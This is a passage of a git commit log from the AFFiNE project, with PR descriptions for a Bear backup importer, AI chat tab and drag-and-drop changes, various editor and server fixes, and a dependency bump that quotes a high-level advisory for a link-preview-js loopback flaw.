Bear backups are zip archives of TextBundle directories. The importer:
- Parses Bear-specific markdown (highlights `==text==`, callouts `>
[!NOTE]`, inline tags `#tag`)
- Extracts creation/modification dates from `info.json` metadata
- Filters out trashed notes
- Converts Bear tags to AFFiNE tags (consolidated by root segment)
- Builds folder hierarchy from nested tag paths (e.g.,
`#work/projects/alpha`)
- Uses JSZip for lazy decompression to handle large backups without OOM

### Markdown Zip Folder Hierarchy

`importMarkdownZip` now returns `{ docIds, folderHierarchy }` instead of
just `docIds[]`, enabling the UI to recreate the zip's directory
structure as AFFiNE folders.

## Related Issues

- Implements the TextBundle-based import approach suggested in #14115 /
Discussion #14142
- Addresses folder structure preservation requested in #10003
- Partially addresses frontmatter metadata import from #11286

## Test Plan

- [ ] Import a Bear `.bear2bk` backup file via the import dialog
- [ ] Verify tags are created and assigned to documents
- [ ] Verify folder hierarchy matches Bear's nested tag structure
- [ ] Verify creation/modification dates are preserved
- [ ] Verify highlighted text and callouts render correctly
- [ ] Verify images and attachments are imported
- [ ] Import a markdown zip with nested folders, verify folder structure
is recreated
- [ ] Verify trashed Bear notes are excluded

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Bear (.bear2bk) backup import: bulk import notes, convert/dedupe tags,
create nested folders, and return imported doc IDs plus folder
hierarchy; UI import option and progress integrated.
* Markdown ZIP import now returns an optional folder hierarchy alongside
created doc IDs.

* **Bug Fixes / Improvements**
* Highlighting: mark elements validate color names, default safely, and
apply consistent background styling.

* **Chores**
  * Added runtime dependency for ZIP handling.

* **Documentation**
  * Added localization strings and i18n accessors for Bear import UI.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 11:29:40 +08:00
renovate[bot] 429e7f495d chore: bump up link-preview-js version to v4.0.1 [SECURITY] (#14917)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[link-preview-js](https://redirect.github.com/OP-Engineering/link-preview-js)
| [`4.0.0` →
`4.0.1`](https://renovatebot.com/diffs/npm/link-preview-js/4.0.0/4.0.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/link-preview-js/4.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/link-preview-js/4.0.0/4.0.1?slim=true)
|

---

### link-preview-js vulnerable to IPv6 and internal loopback attacks
[CVE-2026-43897](https://nvd.nist.gov/vuln/detail/CVE-2026-43897) /
[GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

<details>
<summary>More information</summary>

#### Details
##### Impact
The library did not check for IPv6 loopback attacks. There was also a
DNS attack, where an address could be resolved into an internal IP. This
could cause internal data leaks.

##### Patches
Problem has been patched in version 4.0.1. However, it cannot be
completely solved by the package alone. The regex used for validation
has been tightened for IPv6 addresses.

The DNS resolving, however, is more difficult. The regex has been
tightened to prohibit .internal, .local, .nip.io and .sslip.io
addresses, however there can be other services not on the list,
therefore it is imperative that users use the resolveDNSHost option to
do DNS resolution before fetching content. To that regard a (scary)
error message has been added when the option is not set.

##### Workarounds
Users can do their own validation before fetching content.

Reported by https://github.com/Andrew-most-likely

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q)
-
[https://github.com/OP-Engineering/link-preview-js/pull/179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)
-
[https://github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede](https://redirect.github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede)
-
[https://github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)
-
[https://github.com/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>OP-Engineering/link-preview-js (link-preview-js)</summary>

###
[`v4.0.1`](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)

[Compare
Source](https://redirect.github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1)

#### What's Changed

- Loopback fixes by
[@&#8203;ospfranco](https://redirect.github.com/ospfranco) in
[#&#8203;179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)

**Full Changelog**:
<https://github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-07 11:29:35 +08:00
Davide Conte 339f89220a fix(core): prevent navigation panel from reordering while typing (#14831) 2026-05-07 11:28:19 +08:00
Adarsh Singh 440ff0c342 fix(editor): resolve UX inconsistencies in the AI chat interface (#14850)
# Closes #14189.

Fixes the three UX issues reported in the original bug report, plus one
small
adjacent polish on the right-sidebar toggle that was requested during
review.

Each concern in the issue is addressed end-to-end, with the same
treatment
applied to both places the AI chat panel lives: the **sidebar chat
panel**
(right panel on a doc page) and the **standalone `/chat` page**.

---

## 1. `+` button → persistent multi-session tabs (issue point 1)

**Before:** clicking `+` called `createFreshSession()` (standalone) or
`newSession()` (sidebar), both of which tore down the current chat
content
and replaced it in place. There was no way to keep two chats open at
once.

**After:** a browser/IDE-style tab strip lives above the chat content.
Each
open session gets its own tab with a close `×`; the active tab is
highlighted; `+` now adds a tab rather than replacing the chat.

### Details
- New Lit component `ai-chat-tabs`
([packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts)).
- Tab title is derived from `session.title` → first user message → `"New
chat"`.
- Horizontal scroll when tabs overflow, with a `wheel` handler that
converts
    mouse wheel / trackpad vertical swipe into horizontal scroll (native
horizontal trackpad swipes also work natively via `overflow-x: auto`).
- Auto `scrollIntoView({ inline: 'nearest' })` on active tab change, so
a
newly created or newly selected tab slides into view instead of staying
    hidden behind the toolbar.
- Close `×` removes the tab from the strip but leaves the session on the
server (matches the existing **Chat history** dropdown semantics — the
session is still reachable there). Closing the active tab switches to an
    adjacent one; closing the last tab starts a fresh session.
- Persistence: open session IDs are saved per-workspace in
`localStorage`
under `ai-chat-open-tabs:{workspaceId}`. On mount, the React pages
hydrate
  those IDs via `AIProvider.session.getSession` /
  `CopilotClient.getSession` — no new backend or schema work.
- Wiring: identical effects on both variants
([chat.tsx
(sidebar)](packages/frontend/core/src/desktop/pages/workspace/detail-page/tabs/chat.tsx)
and
[chat/index.tsx
(standalone)](packages/frontend/core/src/desktop/pages/workspace/chat/index.tsx))
  — hydrate → sync active session into tabs → persist.
- The tab strip sits on the same row as the existing toolbar icons
  (pin / history / `+`), separated by `flex: 1` + `min-width: 0` so the
  tabs scroll cleanly up to the toolbar boundary.
- The `ShadowlessElement` base class injects its static CSS globally,
and the
`:host` selector does not match in a React-rooted DOM — the component
uses
  tag-selector CSS (`ai-chat-tabs { display: flex; … }`) instead.

## 2. Drag-and-drop attachments (issue point 2)

**Before:** the chat input accepted no DnD. Attaching anything required
the
`+` → file-picker flow.

**After:** the chat input accepts OS files via native HTML5 DnD and
AFFiNE
documents via the repo's existing pragmatic-drag-and-drop
infrastructure.

### Details
- Native handlers (`dragenter/over/leave/drop`) on

[ai-chat-input.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-input/ai-chat-input.ts)
accept OS files: images go into the image preview grid, other files
become
  attachment chips, with the same 50 MB per-file cap as the `+` picker.
- Internal AFFiNE document drags from the nav panel land as doc chips,
  handled via `dropTargetForElements` from
  `@atlaskit/pragmatic-drag-and-drop` (same library the rest of the app
  already uses for internal DnD).
- A "Drop to attach" overlay appears during drag, reusing the existing
focused-border token (`--affine-v2-layer-insideBorder-primaryBorder`)
for
  visual consistency with the focused state.
- The image/file routing logic that previously lived inline in
  `add-popover.ts` was factored into a shared helper

[attachment-utils.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-chips/attachment-utils.ts)
  (`addFilesToChat`), so the `+` picker and the drop handler stay in
  lockstep.
- Analytics: extended the `addEmbeddingDoc.control` union in
[events.ts](packages/frontend/track/src/events.ts) with `'dragDrop'` so
  drag-originated attachments are distinguishable from button-initiated
  ones in telemetry.
- `@atlaskit/pragmatic-drag-and-drop` is promoted from a transitive
  dependency (via `@affine/component`) to a direct dependency of
  `@affine/core` and `yarn.lock` is refreshed accordingly.

## 3. Chat-history tooltip + icon (issue point 3)

**Before:** hovering the chat-history button showed a tooltip whose
background did not invert for dark theme (`--affine-tooltip` is not
theme-aware), and the icon was `ArrowDownSmallIcon` — a chevron that
does
not convey "history."

**After:** the tooltip primitive itself is theme-aware (every tooltip in
the app benefits, not just the chat one), and the icon is the
semantically-clear `HistoryIcon`.

### Details
- [tooltip.ts](blocksuite/affine/components/src/tooltip/tooltip.ts) now
uses
  `var(--affine-v2-tooltips-background, var(--affine-tooltip))` and
  `var(--affine-v2-tooltips-foreground, var(--affine-white))`. The V2
  tokens auto-invert with theme; the old vars remain as fallbacks so
  components that override via the existing `tooltipStyle` escape hatch
  continue to work.
- Triangle arrow colors updated to use the same V2 token.
-
[ai-chat-toolbar.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-toolbar.ts):
  `ArrowDownSmallIcon` → `HistoryIcon`; added
  `data-testid="ai-panel-chat-history"` for future e2e coverage.

## 4. Right-sidebar toggle: tooltips + open-state icon *(adjacent
polish)*

Not part of the original issue, but surfaced while testing the tab strip
—
neither of the two right-sidebar toggle buttons had hover affordance,
and
both used the same icon regardless of the sidebar's state.

- Added `tooltip="Open sidebar"` on the route-container button shown
when
  the sidebar is hidden.
- Added `tooltip="Close sidebar"` on the sidebar-header button shown
when
  the sidebar is expanded.
- The close button now renders a small inline `RightSidebarOpenIcon`
  variant: same outline as `RightSidebarIcon`, but with the right panel
  filled in the AFFiNE accent color to convey the open state. Icon shape
  change is self-contained — no new icon asset added to
  `@blocksuite/icons`.

---

## Commits

- `2adc0c7` — fix(ai-chat): theme-aware tooltip + semantic chat-history
icon *(2 files)*
- `bf26974` — feat(ai-chat): drag-and-drop file and doc attachments in
chat input *(7 files)*
- `fca29c8` — feat(ai-chat): persistent multi-session tab strip *(8
files)*
- `7d5dffe` — feat(workbench): tooltips and open-state icon for the
right-sidebar toggle *(2 files)*

Kept ordered smallest → largest blast radius so the history is easy to
bisect.

---

## Test plan

Verified locally against a fresh server stack (postgres / redis /
mailpit via
compose, migrations run) signed in as `dev@affine.pro`, in both `/chat`
and
the sidebar chat on a doc page, in light and dark themes:

- [x] Tooltip: hover the chat-history icon in dark mode → tooltip is
dark-on-light; toggle to light mode → tooltip is light-on-dark. Existing
tooltips on other surfaces (slash menu, edgeless, linked-doc) still
render correctly.
- [x] Icon: chat-history button renders the history glyph (clock), not a
chevron.
- [x] Drag-and-drop (OS file): drop a PDF / PNG / TXT onto the input →
overlay shows → chips/images appear; file > 50 MB → rejected silently
(same as `+` picker).
- [x] Drag-and-drop (internal doc): drag an AFFiNE doc from the nav
panel → becomes a doc chip.
- [x] Pin-picker, `+` picker, paste-image — all unchanged.
- [x] Tab strip: first chat auto-becomes a tab on first message; `+`
adds tab; click tab switches chat; `×` removes tab and switches to
adjacent; close last tab → new fresh tab spawns.
- [x] Reload browser → tab strip rehydrates from localStorage with the
same sessions.
- [x] Tab overflow: 12+ tabs → horizontal scroll via trackpad vertical
swipe, trackpad horizontal swipe, and mouse wheel; active tab
auto-scrolls into view on `+` click.
- [x] Right-sidebar: hover both toggle buttons → tooltips appear; open
the sidebar → close button shows the filled right-panel icon.
- [x] `yarn lint:ox` and lint-staged both clean on every commit.

Not verified locally (no local model key configured): the assistant
actually
streams a response. Drop/chip flow is independent of that path.

## Out of scope / follow-ups

- No new unit or Playwright tests — the fixes are visually verifiable
and
  reuse existing reducer / state paths. Happy to add tests if reviewers
  prefer.
- `@affine/native` is not required for the web dev stack; I only built
  `@affine/server-native`. Irrelevant to the PR diff.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Multi-tab chat UI with a tabs component, open/close/switch actions,
and per-workspace persistence/restoration.
  * Drag-and-drop attachments into chat input (files and docs).

* **UI/UX**
  * Tooltip theming moved to v2 variables (includes arrow color).
  * Sidebar toggle/close buttons now show tooltips.
  * “Drop to attach” overlay and updated history icon.

* **Behavior**
  * Unified attachment handling with 50MB validation and toast notices.

* **Analytics**
  * Attachment events record drag-and-drop as a control method.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 04:04:43 +08:00
DarkSky eb9cc22502 feat(server): refactor for byok (#14911) 2026-05-07 04:03:14 +08:00
DarkSky 4e169ea5c7 fix(editor): cross browser test stability (#14897)
#### PR Dependency Tree


* **PR #14897** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved reliability of shape and connector detection by forcing full
DOM renders during waits.
* Fixed race conditions in code-block theme loading and cleanup when
components unmount.
* Refined viewport element discovery to correctly handle
rotated/canvas-layer elements and avoid stale DOM removal.

* **Tests**
  * Increased polling timeouts and retries to reduce flakiness.
* Disabled per-file parallelism and ensured test setup performs full
cleanup before starting; extended test timeout.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 20:07:40 +08:00
Ahsan Khaleeq 9e412f58ec feat(editor): add collapse/expand functionality to code block component (#14884)
This PR fixes #14040 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Code blocks can be collapsed and expanded via a toolbar toggle
(visible when the document is editable).
* Collapsed code blocks show a limited preview (~8 lines) with a bottom
fade overlay and reduced padding.
* Toolbar button updates icon and tooltip to reflect collapsed/expanded
state.
* Collapse state is preserved on the block so its current
collapsed/expanded setting is retained.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 05:07:42 +08:00
Aisha Roslan 5d234ad6a8 fix(editor): single-letter tags in select/multi-select table cell (#14808)
### Summary of Changes
Resolves #14715 and #14280.

When a user types into a **Select/Multi-Select** table cell to
create/choose a tag, that character is stashed on the cell container
(setTagDraft) instead of going through valueSetFromString. Opening the
tag picker reads it via consumeTagDraftFromTableCellHost.

### Verification
- Added unit test to check that single-character input doesn't
immediately call valueSetFromString.



https://github.com/user-attachments/assets/432b2693-52f9-4ab4-a694-8440aea007a3



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Tag selection popups now initialize with draft text from keypresses in
tag columns, improving user experience when editing tags.

* **Tests**
* Added comprehensive hotkey tests for single-select and multi-select
tag column behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:58:18 +08:00
DarkSky 1ad088398f fix(server): test & schema 2026-05-04 03:56:14 +08:00
Aisha Roslan 74d5ebad13 fix(editor): stretch latex preview content (#14857)
### Summary of Changes
Resolves #13340. Change align-items to stretch to full width to avoid
tag/label from overlapping with equation.

### Screenshot Verification
**Before**
<img width="661" height="256" alt="Screenshot 2026-04-19 at 5 58 03 PM"
src="https://github.com/user-attachments/assets/a99d0138-838f-4f91-bd63-cbd07710484c"
/>

**After**
<img width="614" height="275" alt="Screenshot 2026-04-19 at 5 58 16 PM"
src="https://github.com/user-attachments/assets/7e62ab09-f290-4b6e-9cd6-d20b8f990da3"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Improved the vertical alignment of LaTeX block content to better
utilize container space.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:54:01 +08:00
Ahsan Khaleeq a1800cf8b2 feat(editor): remove max-height restriction from mermaid preview container (#14882)
This PR fixes #14874 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Removed height limitation on Mermaid diagram previews in code blocks,
allowing larger diagrams to render at their full size without being
constrained by a fixed maximum height.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:46:59 +08:00
DarkSky fa66139230 feat(server): add flag for calendar enable (#14896)
#### PR Dependency Tree


* **PR #14896** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added configuration option to manage Google Calendar account linking
access. Administrators can now disable new account connections to
control calendar service integrations. When disabled, the Google
provider is hidden from available options and new linking attempts are
blocked, while existing accounts remain fully functional.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:45:49 +08:00
DarkSky 027d163921 fix(server): add embedding table repair (#14895)
fix #14894


#### PR Dependency Tree


* **PR #14895** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved database initialization for self-hosted deployments with
automatic creation and repair of embedding tables and indexes, applied
only when related base tables and extensions are present.
* Updated pre-deploy process to run Prisma migrations, perform
embedding-table maintenance, and execute additional data migrations as
part of setup.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:45:37 +08:00
Abdul Rehman 39abb936b8 fix(core): prevent Alt+Key shortcuts from hijacking macOS Option-key input (#14866)
Fixes #14519

## Summary

On macOS, the Option key combined with a letter produces locale input
characters (e.g. Polish layout: Option+S → `ś`, Option+L → `ł`). The
AFFiNE command registry registers shortcuts like `Alt+KeyS` (used for
Page ↔ Edgeless mode switch) via `tinykeys`, which matches on
`event.code` (the physical key) — so it fires even when the user was
actually typing a non-ASCII character.

Reported in #14519: Polish users cannot type `ś` inside AFFiNE because
Option+S triggers the mode switch instead.

## Fix

In the command registry handler
([registry.ts](packages/frontend/core/src/commands/registry/registry.ts)),
skip the command when Alt is the only modifier **and** the key produced
a non-ASCII character — the user intends to type the character, not
invoke the shortcut.

Matches the existing handling in blocksuite's `keymap.ts` (added for the
same class of issue in #14059).

## Demo



https://github.com/user-attachments/assets/eb6d2e69-39bf-4236-a886-9e2bde425626



## Verified locally (macOS)

- Switched input source to Polish
- Typed `właśnie` in an AFFiNE doc — all characters including `ś`
(Option+S), `ł` (Option+L) now produce the correct output
- Previously Option+S would toggle edgeless mode
- US layout (Option+S → `ß`) and other locale chars (ą, ń, ę) also now
pass through correctly
- Regular Cmd-based shortcuts (Cmd+K, Cmd+S, etc.) unaffected because
the guard excludes `metaKey`

## Test plan

- [x] On macOS, add Polish input source (System Settings → Keyboard →
Input Sources → +)
- [x] Switch to Polish layout
- [x] In any AFFiNE doc, type Option+S → `ś` appears (not mode switch)
- [x] Confirm other shortcuts (Cmd+K, Cmd+Enter, etc.) still work
- [x] Confirm on US layout that Option+S produces `ß` (OS default)
without firing the mode switch

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed keyboard event handling with Alt key and non-ASCII characters to
prevent unintended command execution.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 02:35:35 +08:00
Abdul Rehman 9751cab16c fix(editor): native table column resize broken in edgeless mode (#14824)
Fixes #14717

## Summary

When a native `affine:table` block is placed in a note on the edgeless
canvas, dragging the column resize handle (or the column/row drag
handles) causes the canvas to pan instead of triggering the resize/drag,
because the edgeless `DragController` listens at the `pointerdown` level
— earlier than `SelectionController`'s existing `mousedown` handler.

## Fix

Two interception layers added to
`blocksuite/affine/blocks/table/src/selection-controller.ts`, matching
the working pattern in `affine:database`'s `database-header-column.ts`:

1. **DOM-level `pointerdown` `stopPropagation()`** in `dragListener()` —
prevents the edgeless `DragController` from capturing the event before
BlockSuite's event system sees it.
2. **`handleEvent('dragStart', ...)`** in `hostConnected()` — returns
`true` when the target is a resize/drag handle, so the BlockSuite event
dispatcher doesn't route to the edgeless tool controller.

Selectors guarded: `[data-width-adjust-column-id]`,
`[data-drag-column-id]`, `[data-drag-row-id]`.

Mobile and readonly states preserved (matching existing `dragListener()`
guards).

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved drag-and-drop interaction handling for table operations,
including column width adjustment and row/column dragging. Enhanced
event handling to prevent unintended drag actions and ensure proper
behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 02:34:29 +08:00
congzhou09 5e97e67ecd fix(editor): prevent connector label from breaking after click + move in empty label editor (#14830)
### Problem
●In edgeless mode, after clicking and moving in a connector's label
editor, if the label editor has empty content at the end of the editing,
the label editor for that connector can not be triggered again.

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/8d300720-5ed8-4f9c-90fa-fbf059417ff8

### Root Cause
**Direct cause**
●The `labelOffset` property is **stashed** at drag-start, but is **not
properly popped** afterward. As a result, when
`mountConnectorLabelEditor()` is called the second time
(`packages/affine/gfx/connector/src/text/edgeless-connector-label-editor.ts`),
`connector.labelOffset` returns `undefined` instead of the default value
provided by the `@field` decorator.

**Why moving after clicking incorrectly triggers a drag-start**
●The root issue lies in the interaction between click and drag event
handling. Here's the actual flow:
1.`dispatcher.add('click', () => true)` is registered in
`EdgelessConnectorLabelEditor`.
2.On pointer-down, both `ClickController` and `DragController` receive
the event.
3.On pointer-up, `ClickController` fires a **synthetic click**. The
handler from step 1 returns `true`, triggering
`context.get('defaultState').event.stopPropagation()`.
4.This prevents the native pointer-up from bubbling to `DragController`.
However, a subsequent pointer-move still causes `DragController` to
**incorrectly synthesize a drag-start + drag-move**.

**Fundamental root cause**
●The line `context.get('defaultState').event.stopPropagation()` in
`UIEventDispatcher::run()` stops **both** synthetic and native event
bubbling. It should only stop synthetic event propagation.
●The synthetic event bubbling stopping is already properly handled by
the immediate `return` statement on the next line, because the runners
are prepared in strict order (current → parent → grandparent → ... →
global) by `UIEventDispatcher::_getEventScope()` and then **executed
sequentially** in `UIEventDispatcher::run()`.

### Fix
●Since I cannot rule out that other (current or future) event handlers
may rely on this native event bubbling stopping behavior, I chose not to
remove the `context.get('defaultState').event.stopPropagation()` line
completely. Instead, I added a new constant and now skip
`stopPropagation()` **only** for the following synthetic events:
```ts
const syntheticEventNames = new Set(['click', 'doubleClick', 'tripleClick']);
```
These currently represent all known synthetic click events triggered
from pointer-up.

### After
●The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/65b8a3ce-0767-4d80-986b-8bc6081ddd4c
2026-05-04 02:33:09 +08:00
Adarsh Singh 7046ad7bf4 fix(editor): align selection/handle/remote/text overlays with blocks (#14862)
# Closes #14855.

## The bug

When an `affine:embed-synced-doc` is placed on an edgeless canvas and
resized which sets `model.props.scale` to a value ≠ 1 - the
block-selection frame rendered **inside** that embedded editor is drawn
offset from the actual block boundary. The reporter hit this in Safari,
but the root cause is platform-independent.

![reported
screenshot](https://github.com/user-attachments/assets/ce415528-1d01-4bfe-9d63-1e2884ca2f70)

## Root cause

`affine-embed-edgeless-synced-doc-block` applies `transform:
scale(modelScale)` to its `.affine-embed-synced-doc-container` so the
embedded editor visually fits inside its edgeless xywh
([embed-edgeless-synced-doc-block.ts#L48-L58](https://github.com/toeverything/AFFiNE/blob/canary/blocksuite/affine/blocks/embed-doc/src/embed-synced-doc-block/embed-edgeless-synced-doc-block.ts#L48-L58)).
The inner `Viewport` exposes that outer scale as `viewScale =
boundingClientRect.width / offsetWidth`.

PR #14015 and PR #14074 already taught the surface canvas and
`GfxBlockComponent.getCSSTransform` to compensate by dividing by
`viewScale`. But several selection-related overlays that render inside
the same scaled container were **not** updated in those PRs. They
either:

- read `viewport.toViewCoord(x, y)` - which returns `(x - viewportX) *
zoom * viewScale` and drop the result into CSS `left` / `top` inside the
scaled container, or
- hand-build a `translate(translateX, translateY) scale(zoom)` transform
without `viewScale` compensation.

The outer CSS `scale(viewScale)` then re-applies the scale, leaving the
overlays one factor of `viewScale` away from their blocks. That's
exactly the misalignment in the screenshot - the rect's size looks right
but its position is offset.

## The fix

Mirror the pattern shipped in #14074 everywhere the inner overlays are
placed:

- position: `(model - viewportX) * zoom / viewScale`
- transform scale: `zoom / viewScale`
- translate: `translateX / viewScale, translateY / viewScale`

This keeps the overlays in the same reference frame as
`GfxBlockComponent.getCSSTransform` so they line up with the block
they're framing. When `viewScale === 1` (normal edgeless canvas, outside
any embed) every `/ viewScale` is a no-op and behaviour is unchanged.

## Why this is safe

- When `viewScale === 1` - every existing caller outside
`embed-edgeless-synced-doc` - the math reduces to the original
expression byte-for-byte.
- The fix strictly mirrors the invariant already adopted by
`GfxBlockComponent.getCSSTransform` in #14074. It's the same division by
`viewScale` applied in the same place.
- No public API, type, or DOM structure changed.

## Scope / known limitations

- The `Viewport._cachedBoundingClientRect` cache is only invalidated by
its own `ResizeObserver`
([viewport.ts#L500-L505](https://github.com/toeverything/AFFiNE/blob/canary/blocksuite/framework/std/src/gfx/viewport.ts#L500-L505)).
A CSS-transform change on an ancestor (e.g. the user panning/zooming the
outer edgeless canvas) does not fire it, so in theory `viewScale` can go
stale between outer-viewport updates. In practice this hasn't come up in
repro - the inner viewport's shell is observed and fires whenever layout
shifts. If it turns out to matter I'm happy to add a
`viewport.onResize()` refresh hook off the existing
`GfxViewportInitializer` in a follow-up.
- No integration test added - the existing
`blocksuite/integration-test/edgeless/` suite has no `embed-synced-doc`
harness. Adding one is a larger scope; can follow up if requested.

## Test plan

- [x] `yarn typecheck` - passes
- [x] `yarn lint:ox` - `0 warnings, 0 errors`
- [x] `yarn prettier --write` on the 5 touched files - no changes
- [ ] Manual: on canary, create an edgeless canvas, drop an
embed-synced-doc, resize with `Shift` held so `model.props.scale` ≠ 1,
select any block inside, and verify the blue selection frame sits flush
with the block's boundary (confirm on Safari, Chrome, Firefox).
- [ ] Regression check: on a normal edgeless canvas (no embed), verify
element selection, drag handle, and text/shape inline editors still
render correctly (these code paths hit `viewScale === 1` and should be
unchanged).

## Related PRs

- #14015 - fixed surface canvas at non-1 `viewScale`.
- #14074 - fixed `GfxBlockComponent.getCSSTransform` at non-1
`viewScale`. This PR completes that series by covering the selection
overlays.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Fixed positioning and scaling of inline text editors, selection
rectangles, drag handles, and remote cursors so overlays and editors
remain correctly aligned and sized when the viewport uses an additional
outer scale/transform during zooming and panning.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 01:38:39 +08:00
DarkSky e90e3e537c fix(server): lint 2026-05-04 00:48:23 +08:00
DarkSky d64f368623 feat(server): refactor copilot (#14892)
#### PR Dependency Tree


* **PR #14892** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-04 00:36:47 +08:00
Remi Huigen fa8f1a096c fix(server): allow custom R2 jurisdictional endpoint (#14848)
## Summary
This PR fixes `cloudflare-r2` storage configuration so jurisdictional R2
endpoints (for example EU buckets) work correctly.

Closes #14847

## Problem
`cloudflare-r2` currently ignores `config.endpoint` and always uses:

`https://<accountId>.r2.cloudflarestorage.com`

That breaks uploads for jurisdictional buckets that require endpoints
like:

`https://<accountId>.eu.r2.cloudflarestorage.com`

## Changes
- Updated `R2StorageProvider` endpoint resolution:
  - use `config.endpoint` when provided
- otherwise fall back to `https://${accountId}.r2.cloudflarestorage.com`
- Kept `forcePathStyle: true` behavior unchanged
- Updated validation to require `accountId` **or** `endpoint`
- Improved storage schema descriptions to mention jurisdiction endpoints
- Added focused unit tests for:
  - default account endpoint behavior
  - custom jurisdiction endpoint behavior

## Backward Compatibility
- Existing R2 configs that only provide `accountId` continue to work
exactly as before.
- New behavior only applies when a custom `config.endpoint` is
explicitly set.

## Tests
- Added: `packages/backend/server/src/base/storage/__tests__/r2.spec.ts`
- Verifies both default and custom endpoint selection paths.

_Disclaimer: parts of this PR were implemented with AI assistance._

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Cloudflare R2 config adds an optional "jurisdiction" (EU) option and
